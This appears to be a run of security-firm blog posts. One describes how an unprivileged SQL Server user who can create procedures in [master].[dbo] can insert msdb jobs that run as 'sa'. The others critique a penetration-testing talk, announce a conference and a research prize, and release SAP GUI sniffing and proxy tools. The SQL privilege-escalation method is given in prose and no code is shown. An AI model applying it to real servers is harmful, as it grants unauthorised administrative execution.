I was playing with a few SQL server idiosyncrasies more than a year ago before becoming so completely distracted with the whole SAP protocol-decoding business. Having some time on my hands for once, I thought I would blog it.
Early last year, I found it possible to create jobs owned by other users on MS SQL Server (2000, 2005 and 2008) by an unprivileged user - providing the user had the capability of creating or altering stored procedures in the [master].[dbo] schema. The reason for this, comes as a result of cross-database permissions being chained, by default, across the system databases [master], [msdb] and [tempdb]. According to Microsoft, this is by design.
Where the issue comes in is that should a lower-privileged user have the capability of creating or altering stored procedures within [master].[dbo], it now becomes possible to insert records into the [msdb].[dbo].[sysjobs*] by executing the stored procedure - even without having any direct access to insert records into these tables. This is not particularly different from other system stored procedures (such as sp_addjob, for example) which allow users to create jobs, but the difference comes in in terms of the data we're allowed to populate.
SQL Server allows jobs and job steps to be executed under the context of specific user accounts. Whilst the majority of users (by default) are able to schedule jobs on the SQL Server, they can only schedule jobs which execute under their own account context and only members of the sysadmin server roles can add jobs which execute under the context of other user accounts. The underlying system stored procedures provided by Microsoft (sp_addjob and similar) prevent this functionality from being abused by lower privileged users. However, should it be possible to create/alter a stored procedure within [master].[dbo], we can insert records into the various [msdb] job tables with data of our choosing.
Hard-coding the [owner_sid] field in [msdb].[dbo].[sysjobs] to 0x01 (the default sid for the 'sa' user account) and the [database_user_name] field in [msdb].[dbo].[sysjobsteps] to 'sa' will allow us to create a job and associated job-step owned by the 'sa' user even though we are using an unprivileged account and do not have any permissions on the underlying tables.
In the following image, user eoppoc has no direct access to [msdb].[dbo].[sysjobs].
Executing a stored procedure, however, allows this access.
The following two images show the job created us user 'sa', with a single job step configured to execute as user 'sa'.
Honestly, I don't really see this as any form of issue. In order for it to be exploitable, there are far too many prerequisites and requirements and these prerequisites open other cans of worms. Furthermore, whilst one has the capability to schedule jobs to run as other users, one does not have the privilege level required to update the job cache. This means the newly created and scheduled job will only run after the SQL Server Agent has been restarted. It is nevertheless interesting and blog-worthy. And who knows, maybe this will be interesting / useful to somebody.
A zip file containing a procedure for SQL2000, and a procedure for SQL2005/2008 can be downloaded from here.
Oh - as a final note, Microsoft mentions that: "These databases are strictly system databases and is recommended not to create any user objects in these databases".
It was a great event with some great presentations, including (if I may say) our own Ian deVilliers' *Security Application Proxy Pwnage*. Another presentation that caught my attention was Haroon Meer's *Penetration Testing considered harmful today*. In this presentation Haroon outlines concerns he has with Penetration Testing and suggests some changes that could be made to the way we test in order to improve the results we get. As you may know a core part of SensePost's business, and my career for almost 13 years, has been security testing, and so I followed this talk quite closely. The raises some interesting ideas and I felt I'd like to comment on some of the points he was making.
As I understood it, the talk's hypothesis could be (over) simplified as follows:
Next, I'd like to consider the assertion that penetration testing or even security assessment is presented as the "solution" to the security problem. While it's true that many companies do employ regular testing, amongst our customers it's most often used as a part of a broader strategy, to achieve a specific purpose. Security Assessment is about learning. Through regular testing, the tester, the assessment team and the customer incrementally understand threats and defenses better. Assumptions and assertions are tested and impacts are demonstrated. To me the talk's point is like saying that cholesterol testing is being presented as a solution to heart attacks. This seems untrue. Medical testing for a specific condition helps us gauge the likelihood of someone falling victim to a disease. Having understood this, we can apply treatments, change behavior or accept the odds and carry on. Where we have made changes, further testing helps us gauge whether those changes were successful or not. In the same way, security testing delivers a data point that can be used as part of a general security management process. I don't believe many people are presenting testing as the 'solution' to the security problem.
It is fair to say that the entire process within which security testing functions is not having the desired effect; Hence the talk's reference to a "security apocalypse". The failure of security testers to communicate the severity of the situation in language that business can understand surely plays a role here. However, it's not clear to me that the core of this problem lies with the testing component.
A significant, and interesting component of the talk's thesis has to do with the role of "0-day" in security and testing. He rightly points out that even a single 0-day in the hands of an attacker can completely change the result of the test and therefore the situation for the attacker. He suggests in his talk that the testing teams who do have 0-day are inclined to over-emphasise those that they have, whilst those who don't have tend to underemphasize or ignore their impact completely. Reading a bit into what he was saying, you can see the 0-day as a joker in a game of cards. You can play a great game with a great hand but if your opponent has a joker he's going to smoke you every time. In this the assertion is completely true. The talk goes on to suggest that testers should be granted "0-day cards", which they can "play" from time to time to be granted access to a particular system and thereby to illustrate more realistically the impact a 0-day can have. I like this idea very much and I'd like to investigate incorporating it into the penetration testing phase for some of our own assessments.
What I struggle to understand however, is why the talk emphasizes the particular 'joker' over a number of others that seems apparent to me. For example, why not have a "malicious system administrator card", a "spear phishing card", a "backdoor in OTS software" card or a "compromise of upstream provider" card? As the 'compromise' of major UK sites like the Register and the Daily Telegraph illustrate there are many factors that could significantly alter the result of an attack but that would typically fall outside the scope of a traditional penetration test. These are attack vectors that fall within the victim's threat model but are often outside of their reasonable control. Their existence is typically not dealt with during penetration testing, or even assessment, but also cannot be ignored. This doesn't doesn't invalidate penetration testing itself, it simply illustrates that testing is not equal to risk management and that risk management also needs to consider factors beyond the client's direct control.
The solution to this conundrum was touched on in the presentation, albeit very briefly, and it's "Threat Modeling". For the last five years I've been arguing that system- or enterprise-wide Threat Modeling presents us with the ability to deal with all these unknown factors (and more) and perform technical testing in a manner that's both broader and more efficient.
Threat Modeling makes our testing smarter, broader, more efficient and more relevant and as such is a vital improvement to our risk assessment methodology.
Solving the security problem in total is sadly still going to take a whole lot more work...
This year, for the fourth time, myself and some others here at SensePost have worked together with the team from ITWeb in the planning of their annual Security Summit. A commercial conference is always (I suspect) a delicate balance between the different drivers from business, technology and 'industry', but this year's event is definitely our best effort thus far. ITWeb has more than ever acknowledged the centrality of good, objective content and has worked closely with us as the Technical Committee and their various sponsors to strike the optimal balance. I don't think we have it 100% right yet, and there are some improvements and initiatives that will unfortunately only manifest at next year's event, but this year's program (here and here) is nevertheless first class and comparable with almost anything else I've seen.
<Shameless plug>If you're in South Africa, and you haven't registered, I highly recommend that you do</Shameless plug>This year's Summit explores the idea that trust in CyberSpace is "broken" and that, one for one, all the pillars we relied on to tame the Internet and make it a safe place to do business in, have failed. Basically the event poses the question: "What now"?
We've tried hard to get all our speakers to align in some way with this theme. Sadly, as is often he case, we had fewer submissions from local experts then we hoped, but we were able to round up a pretty killer program, including an VIP list of visiting stars.
After the plenaries each day, the program is divided into themed tracks where talks on a topic are grouped together. Where possible we've tried to include as many different perspectives and opinions as possible. Here's a brief summary of my personal highlights:
Its gonna be excellent. See you there!
On Saturday Dec 3, at BSides Cape Town we announced the winner of a prize for local information security research. The purpose of the competition was twofold. Firstly, to highlight interesting research produced in .za for the purpose of publicising up 'n coming security folks, since there are a few disparate communities (academic / industry is the greatest split). Secondly, to provide some degree of reward in the form of a cash prize. The prize is (unsurprisingly) not meant to compensate for time spent, but rather to give the typical researcher who conducts the work in their spare time some recognition and perhaps a cool gadget to associate with the work.
The competition was a little disappointing for a single, but significant, reason: the lack of nominations. In all, six people nominated three pieces of work from two researchers. Considering there were four security conferences this year in South Africa, it's not possible that even a reasonable minority of the research produced was considered for the prize. This was a no-strings-attached cash prize; there is no handover of IP or copyright, and no requirements on the winner (though we do offer an interview on our blog to publicise their work, should they choose to). With this in mind, it's strange how few nominations were received; for example, while the competition received some coverage on Twitter, very few nominations originated from there. The timing was tight (competition announced two weeks prior to BSides), but that only accounts for a smaller circumference, not a lack of involvement.
The two nominees were:
Thanks to the Pieter for organising BSides Cape Town and providing us a spot to announce the winners, and thanks to everyone who sent in a nomination. Compliments to both nominees for having their work recognised by others in the community, and congratulations to Etienne for winning the prize.
We remain committed to research and the sponsorship concept, so expect an announcement towards the end of next year and keep an eye open during the year for research that strikes you as interesting.
[2011/9/6 Edited to add Slideshare embed]
I am currently in London at the first ever 44con conference. It's been a fantastic experience so far - excellent talks & friendly people.
Yesterday, I presented a paper titled "Systems Applications Proxy Pwnage" . The talk precis sums it up nicely:
It has been common knowledge for a number of years that SAP GUI communicates using an unencrypted and compressed protocol by default, and numerous papers have been published by security professionals and researchers dealing with decompressing this traffic.
Until now, most of these methods have been time consuming, convoluted and have focussed more on obtaining sensitive information (such as credentials) than a thorough understanding of the protocol used by SAP GUI.
During this presentation, the speaker will focus on the protocol used by SAP GUI. The speaker will demo and release a new tool-set to assist security professionals in parsing, decompressing and understanding this protocol, as well as demonstrate how this formerly sacrosanct protocol makes SAP applications potentially vulnerable to a wide-range of attacks which have plagued web applications for years.
The talk went very well. All demos worked perfectly. My newly authored toolset not only seems to have performed admirably during the presentation, but also seems to be in some demand...
As such, I'm pleased to announce the public release of two tools - SApCap and SAPProx.
SApCap is a Java-based packet sniffer, decompressor and protocol analysis tool for SAP GUI. It makes use of a third-party JNI interface for pCap (get it here) and a custom-built JNI decompression interface for SAP. You can download it here.
SAPProx is what I believe to be the world's first ever SAP GUI proxy. Think of it as WebScarab for SAP. You can download it here.
The programs are GPL, and the sources are also available from the relevant pages.
The custom JNI library used for decompressing SAP traffic is also available from the previously mentioned download pages in both binary and source formats. I have, however, only had the opportunity to build binary libraries for Mac OS/X, Linux (32-bit) and Windows (32-bit). I will add more binary libraries as soon as I get back to ZA and have access to some different build environments again.
If you're interested, a copy of my 44con presentation is available from here or below.